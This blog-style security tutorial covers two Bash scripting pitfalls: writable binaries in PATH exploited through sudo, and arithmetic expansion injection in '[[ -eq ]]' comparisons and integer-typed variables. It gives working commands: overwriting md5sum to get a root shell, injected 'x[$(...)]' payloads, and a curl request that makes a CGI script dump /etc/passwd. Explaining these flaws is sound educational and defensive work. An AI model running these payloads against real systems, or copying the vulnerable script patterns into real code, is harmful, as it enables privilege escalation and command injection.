1. Today, I would like to blog about two interesting pitfalls when using Bash Scripts, which can lead to initial access or privilege escalation!
2. The first pitfall is using binaries without specifying full path
   1. This occurs if any of the binaries in use by script is writeable by users.
   2. To be honest, it is Linux Path Abuse privilege escalation technique but from a different perspective.
3. The second pitfall I would like to discuss is Arithmetic Expansion Abuse. It occurs due to how bash does calculations.
4. Bash scripts can be used for privilege escalation and initial access if
   1. It is being run as shell script.
   2. Sudo allows us to run certain shell scripts.
   3. A CGI script is being run on a web server.

Writeable Binaries in PATH

Detection

1. A good way to detect is to check each binary directory for writeable binaries. There should not be any by default, unless you’re root

1

for i in $(echo $PATH | tr ':' '\n'); do find $i -type f -writable; done

2. Actually, it is not 100% fool-proof because sudo may use a different path. So double check with sudo -l

1
2
3
4
5
6

$ sudo -l
Matching Defaults entries for demo on 700109a60338:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User demo may run the following commands on 700109a60338:
    (ALL : ALL) /tmp/md5files.sh

Privilege Escalation

1. Say we have a script like this

1
2
3

#!/bin/bash

md5sum /etc/hosts

• When run, this script will just calculate the MD5 hash of /etc/hosts

2. Our user can run this script as sudo

1
2
3
4
5
6
7

$ sudo -l
[sudo] password for demo: 
Matching Defaults entries for demo on 700109a60338:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User demo may run the following commands on 700109a60338:
    (ALL : ALL) /tmp/md5files.sh

3. Let’s check if md5sum in /usr/bin is writeable

1
2

$ find /usr/bin -type f -writable
/usr/bin/md5sum

4. We can easily overwrite it like this

1

echo "bash" > /usr/bin/md5sum

5. To escalate privileges,

1
2

$ sudo /tmp/md5files.sh
root@700109a60338:/tmp# 

• We are root!

Arithmetic Expansion

1. Arithmetic expansion occurs when
   1. We compare a variable with a number in [[]]
   2. We declare a variable as number, then assign another variable to this variable
2. Apparently, the vulnerability occurs due to how bash interprets arrays. It will try to expand any command in the square bracket.

Compare a variable with a number in [[]]

1. These codes are used to compare input against a number.

1
2
3
4
5
6
7

#!/bin/bash

if [[ $1 -eq 0 ]]; then
    echo PASS;
else 
    echo FAIL;
fi

OR

1
2
3
4
5
6
7

#!/bin/bash

if [[ "$1" -eq 0 ]]; then
    echo PASS;
else 
    echo FAIL;
fi

Both of them are vulnerable to arithmetic expansion abuse 2. To abuse,

1

./test.sh 'x[$(whoami >&2)]'

Output:

1
2

kali
PASS

3. Another example: Bash as CGI script

1
2
3
4
5
6
7
8
9

#!/bin/bash
printf "Content-type: text\n\n"
read PARAMS
NUM="${PARAMS#num=}"
if [[ "$NUM" -eq 100 ]];then
  echo "OK"
else
  echo "NG"
fi

Can be easily exploited with

1
2

$ curl -d num='x[$(cat /etc/passwd > /proc/$$/fd/1)]' http://localhost
/index.cgi

Declare a variable as number, then assign another variable to this variable

1. Example

1
2
3
4
5

#!/bin/bash
typeset -i b # declare "b" as integer type ("typeset" is same as "declare")
a=5
b="$1"
echo "$a"

2. To exploit it,

1
2
3

./setEnv.sh 'x[$(id >&2)]'
uid=1000(kali) gid=1000(kali) groups=1000(kali)
5

3. In addition, we can also modify the environment/ bash variables.

1
2

./setEnv.sh a=10          
10

Reference

1. https://dev.to/greymd/eq-can-be-critically-vulnerable-338m
2. https://mywiki.wooledge.org/BashPitfalls
3. https://www.nccgroup.com/research/shell-arithmetic-expansion-and-evaluation-abuse
4. https://unix.stackexchange.com/questions/172103/security-implications-of-using-unsanitized-data-in-shell-arithmetic-evaluation